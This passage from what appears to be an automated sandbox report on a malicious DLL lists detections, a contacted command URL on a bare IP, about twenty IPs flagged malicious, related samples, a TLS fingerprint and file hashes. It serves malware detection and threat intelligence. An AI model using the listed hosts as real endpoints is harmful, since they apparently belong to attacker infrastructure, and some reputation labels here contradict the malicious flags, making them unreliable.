9.2.rundll32.exe.2790000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
19.2.rundll32.exe.4040000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://51.178.61.60/RUMPKfyWvwh	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://51.178.61.60/RUMPKfyWvwh	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 0000001F.00000003.554303940.000001D7807C0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554360277.000001D78076E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554282780.000001D78077F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000A.00000002.387371903.00000227B4E65000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000A.00000002.387288308.00000227B4E40000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000A.00000003.381842059.00000227B4E45000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000A.00000003.381824890.00000227B4E2C000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	false		high
http://crl.ver)	svchost.exe, 0000001F.00000002.574914431.000001D7FFEEA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000A.00000003.381810222.00000227B4E41000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000001F.00000003.555460068.000001D7807A8000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.555448598.000001D780787000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000A.00000003.381824890.00000227B4E2C000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000A.00000002.387218304.00000227B4E29000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000002.00000002.807728407.000001BFDBA45000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000A.00000003.381842059.00000227B4E45000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000A.00000003.381792789.00000227B4E5D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=	svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 0000001F.00000003.554303940.000001D7807C0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554360277.000001D78076E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554282780.000001D78077F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000A.00000003.381792789.00000227B4E5D000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000A.00000002.387371903.00000227B4E65000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.381806871.00000227B4E56000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	false		high
https://disneyplus.com/legal.	svchost.exe, 0000001F.00000003.554303940.000001D7807C0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554360277.000001D78076E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554282780.000001D78077F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000A.00000003.337166939.00000227B4E34000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000002.00000002.807728407.000001BFDBA45000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000A.00000002.387177184.00000227B4E13000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000A.00000003.381787583.00000227B4E62000.00000004.00000001.sdmp	false		high
http://help.disneyplus.com.	svchost.exe, 0000001F.00000003.554303940.000001D7807C0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554360277.000001D78076E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.554282780.000001D78077F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000A.00000003.381824890.00000227B4E2C000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000002.00000002.807728407.000001BFDBA45000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000A.00000002.387337685.00000227B4E59000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000A.00000003.381792789.00000227B4E5D000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	524857
Start date:	19.11.2021
Start time:	00:57:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 48s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	yFAXc9z51V (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@37/8@0/20
EGA Information:	Failed
HDC Information:	Successful, ratio: 42.9% (good quality ratio 37.8%) Quality average: 67.9% Quality standard deviation: 31.1%
HCA Information:	Successful, ratio: 78% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.54.110.249 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:00:03	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
01:00:18	API Interceptor	8x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse
	nXOpgPAbKC.dll	Get hash	malicious	Browse
	yezVNLNobB.dll	Get hash	malicious	Browse
	rRX4GBcJKK.dll	Get hash	malicious	Browse
196.44.98.190	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse
	nXOpgPAbKC.dll	Get hash	malicious	Browse
	yezVNLNobB.dll	Get hash	malicious	Browse
	rRX4GBcJKK.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	9fC0as7YLE.dll	Get hash	malicious	Browse	66.42.57.149
	FIyE6huzxV.dll	Get hash	malicious	Browse	66.42.57.149
	V0gZWRXv8d.dll	Get hash	malicious	Browse	66.42.57.149
	t5EuQW2GUF.dll	Get hash	malicious	Browse	66.42.57.149
	uh1WyesPlh.dll	Get hash	malicious	Browse	66.42.57.149
	8rryPzJR1p.dll	Get hash	malicious	Browse	66.42.57.149
	a65FgjVus4.dll	Get hash	malicious	Browse	66.42.57.149
	bWjYh6H8wk.dll	Get hash	malicious	Browse	66.42.57.149
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	66.42.57.149
	eyPPiz3W6u.dll	Get hash	malicious	Browse	66.42.57.149
	HjYSwxqyUn.dll	Get hash	malicious	Browse	66.42.57.149
	f47YPsvRI3.dll	Get hash	malicious	Browse	66.42.57.149
	2n64VXT08V.dll	Get hash	malicious	Browse	66.42.57.149
	qUr4bXsweR.dll	Get hash	malicious	Browse	66.42.57.149
	52O6evfqQT.dll	Get hash	malicious	Browse	66.42.57.149
	ONEitXKvz6.dll	Get hash	malicious	Browse	66.42.57.149
	F2433DFBA69148A0C3A5A5951D360B6C3C045090DE06F.exe	Get hash	malicious	Browse	149.28.253.196
	jQ32XS2Lgf.exe	Get hash	malicious	Browse	216.128.137.31
	QbXMqZr3bx.exe	Get hash	malicious	Browse	216.128.137.31
	Whg8jgqeOs.exe	Get hash	malicious	Browse	149.28.253.196
EcobandGH	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190
	bWjYh6H8wk.dll	Get hash	malicious	Browse	196.44.98.190
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	196.44.98.190
	eyPPiz3W6u.dll	Get hash	malicious	Browse	196.44.98.190
	HjYSwxqyUn.dll	Get hash	malicious	Browse	196.44.98.190
	f47YPsvRI3.dll	Get hash	malicious	Browse	196.44.98.190
	2n64VXT08V.dll	Get hash	malicious	Browse	196.44.98.190
	qUr4bXsweR.dll	Get hash	malicious	Browse	196.44.98.190
	52O6evfqQT.dll	Get hash	malicious	Browse	196.44.98.190
	ONEitXKvz6.dll	Get hash	malicious	Browse	196.44.98.190
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse	196.44.98.190
	nXOpgPAbKC.dll	Get hash	malicious	Browse	196.44.98.190
	yezVNLNobB.dll	Get hash	malicious	Browse	196.44.98.190
	rRX4GBcJKK.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	9fC0as7YLE.dll	Get hash	malicious	Browse	51.178.61.60
	FIyE6huzxV.dll	Get hash	malicious	Browse	51.178.61.60
	V0gZWRXv8d.dll	Get hash	malicious	Browse	51.178.61.60
	t5EuQW2GUF.dll	Get hash	malicious	Browse	51.178.61.60
	uh1WyesPlh.dll	Get hash	malicious	Browse	51.178.61.60
	8rryPzJR1p.dll	Get hash	malicious	Browse	51.178.61.60
	a65FgjVus4.dll	Get hash	malicious	Browse	51.178.61.60
	bWjYh6H8wk.dll	Get hash	malicious	Browse	51.178.61.60
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	51.178.61.60
	eyPPiz3W6u.dll	Get hash	malicious	Browse	51.178.61.60
	02D6463C8D80183F843D874AB427C11FC47B6B9CE4726.exe	Get hash	malicious	Browse	51.178.61.60
	HjYSwxqyUn.dll	Get hash	malicious	Browse	51.178.61.60
	f47YPsvRI3.dll	Get hash	malicious	Browse	51.178.61.60
	2n64VXT08V.dll	Get hash	malicious	Browse	51.178.61.60
	qUr4bXsweR.dll	Get hash	malicious	Browse	51.178.61.60
	52O6evfqQT.dll	Get hash	malicious	Browse	51.178.61.60
	ONEitXKvz6.dll	Get hash	malicious	Browse	51.178.61.60
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse	51.178.61.60
	nXOpgPAbKC.dll	Get hash	malicious	Browse	51.178.61.60
	yezVNLNobB.dll	Get hash	malicious	Browse	51.178.61.60

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1101587720598329
Encrypted:	false
SSDEEP:	12:26SJlzXm/Ey6q9995dq3qQ10nMCldimE8eawHjc48v:26mYl68yLyMCldzE9BHjch
MD5:	DC35AEEFD9A4AC32F636DB97DD77F7B4
SHA1:	92C04E6C2D7192FE98D5EFCB12FCC65E522DFD4E
SHA-256:	A74D363E9CF61A22014B82583FCA514A3BE9F0A2D0788D34EF79F50E31C503AE
SHA-512:	F4CE64CFEAC6715BD85E6E5387AA87E9B2BECF90593F8948AA9774390EB24388E86300CEC81CE72C4D1E48ADB47D56D12B836D1142A98BEECDA17E60FB6C3260
Malicious:	false
Preview:	................................................................................,...\.....O......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................CY1...... .....'..#...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.,...\.....O.....................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11245296714236776
Encrypted:	false
SSDEEP:	12:GJUzXm/Ey6q9995d51miM3qQ10nMCldimE8eawHza1miIbMf:4l68x1tMLyMCldzE9BHza1tIY
MD5:	2983F84BE50E8B7DE67EFCF0E59D1161
SHA1:	3111C2A7E722FE73275E9A2AE8CF32981A3E4367
SHA-256:	0FBB517D446AF3E8A8F6BDAA8BE246867EDDEA8897EBC7E623AEE11CF287104C
SHA-512:	3BD7E3B8F810D85A9AAD482DDB3C0A9E576ED21C4EC82605F902C7D50F4AF69C74BDF8A7A3F2004B3E01A2AFC76B53996982C95272F99F060F9A163F4774EBBD
Malicious:	false
Preview:	................................................................................,...\.....O......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................CY1...... .......#...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.,...\....#O.....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11239433397049552
Encrypted:	false
SSDEEP:	12:GyzXm/Ey6q9995hi1mK2P3qQ10nMCldimE8eawHza1mKOZf:Al68fi1iPLyMCldzE9BHza1W
MD5:	B5565AFBE83FB0B5C53610A7C504D210
SHA1:	869EFD851CD535B035ACB3B45226282CAE014AAF
SHA-256:	1FFFF4A904F4BD62AA4D678D46034F77940F7D2A313804CF1D9FCCC1A52110EA
SHA-512:	C65F60294714D8087854B3260D0407C918B2AE92940B37D413D23E2559BF659BD4DF06E4A49C00282C355F309E98A721555C4C0E6760BE9787B3C581C7D84E0F
Malicious:	false
Preview:	................................................................................,...\...:.E......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................CY1...... .........#...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.,...\.....F.....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1101587720598329
Encrypted:	false
SSDEEP:	12:26SJlzXm/Ey6q9995dq3qQ10nMCldimE8eawHjc48v:26mYl68yLyMCldzE9BHjch
MD5:	DC35AEEFD9A4AC32F636DB97DD77F7B4
SHA1:	92C04E6C2D7192FE98D5EFCB12FCC65E522DFD4E
SHA-256:	A74D363E9CF61A22014B82583FCA514A3BE9F0A2D0788D34EF79F50E31C503AE
SHA-512:	F4CE64CFEAC6715BD85E6E5387AA87E9B2BECF90593F8948AA9774390EB24388E86300CEC81CE72C4D1E48ADB47D56D12B836D1142A98BEECDA17E60FB6C3260
Malicious:	false
Preview:	................................................................................,...\.....O......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................CY1...... .....'..#...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.,...\.....O.....................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11245296714236776
Encrypted:	false
SSDEEP:	12:GJUzXm/Ey6q9995d51miM3qQ10nMCldimE8eawHza1miIbMf:4l68x1tMLyMCldzE9BHza1tIY
MD5:	2983F84BE50E8B7DE67EFCF0E59D1161
SHA1:	3111C2A7E722FE73275E9A2AE8CF32981A3E4367
SHA-256:	0FBB517D446AF3E8A8F6BDAA8BE246867EDDEA8897EBC7E623AEE11CF287104C
SHA-512:	3BD7E3B8F810D85A9AAD482DDB3C0A9E576ED21C4EC82605F902C7D50F4AF69C74BDF8A7A3F2004B3E01A2AFC76B53996982C95272F99F060F9A163F4774EBBD
Malicious:	false
Preview:	................................................................................,...\.....O......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................CY1...... .......#...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.,...\....#O.....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11239433397049552
Encrypted:	false
SSDEEP:	12:GyzXm/Ey6q9995hi1mK2P3qQ10nMCldimE8eawHza1mKOZf:Al68fi1iPLyMCldzE9BHza1W
MD5:	B5565AFBE83FB0B5C53610A7C504D210
SHA1:	869EFD851CD535B035ACB3B45226282CAE014AAF
SHA-256:	1FFFF4A904F4BD62AA4D678D46034F77940F7D2A313804CF1D9FCCC1A52110EA
SHA-512:	C65F60294714D8087854B3260D0407C918B2AE92940B37D413D23E2559BF659BD4DF06E4A49C00282C355F309E98A721555C4C0E6760BE9787B3C581C7D84E0F
Malicious:	false
Preview:	................................................................................,...\...:.E......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................CY1...... .........#...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.,...\.....F.....................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	9062
Entropy (8bit):	3.164795917848804
Encrypted:	false
SSDEEP:	192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zjn+I9:j+s+v+b+P+m+0+Q+q+8+w
MD5:	358E84AACB195494C75FAB6D68B99F1A
SHA1:	92E2DD504557E7E15F0C8DBE7E745978BFD6FFCE
SHA-256:	F5AFB444723487FDE4CFD4CCF1536C273796A87371B7E1A160F70706612ABDFB
SHA-512:	8D0A67B410F203A7DC862945830B5F7E91DEF2500FD32DCA1423253246905C76FCBDA1E8EB2D9E4A5AD26582A6B42203F892FE088635516B3275FC2CEF06146A
Malicious:	false
